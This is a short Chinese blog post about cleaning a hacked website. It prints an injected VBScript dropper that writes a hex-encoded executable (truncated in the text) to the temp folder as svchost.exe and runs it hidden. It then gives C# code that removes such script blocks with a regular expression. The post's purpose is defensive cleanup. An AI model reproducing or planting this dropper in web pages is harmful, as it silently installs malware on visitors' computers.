标签:object exists var console shell ext text shel lan
网站被挂马了 ,挂马的形式千奇百怪
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000....(此处省略一万字)”
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
用正则去把这段标签替换为空
public static bool checkStr(string path)
{
bool flag = false;
var res = string.Empty;
var regex = new Regex(@"<SCRIPT Language=VBScript>([\s\S]*)</SCRIPT>", RegexOptions.IgnoreCase);
using (StreamReader sr = File.OpenText(path))
{
res = sr.ReadToEnd();
}
if (regex.IsMatch(res))
{
res = regex.Replace(res, " ");
Console.WriteLine("清理成功");
flag = true;
WriteFile(path, res);
}
return flag;
}
以上用的是C#语言
标签:object exists var console shell ext text shel lan
原文地址:http://www.cnblogs.com/Leesttee/p/7567428.html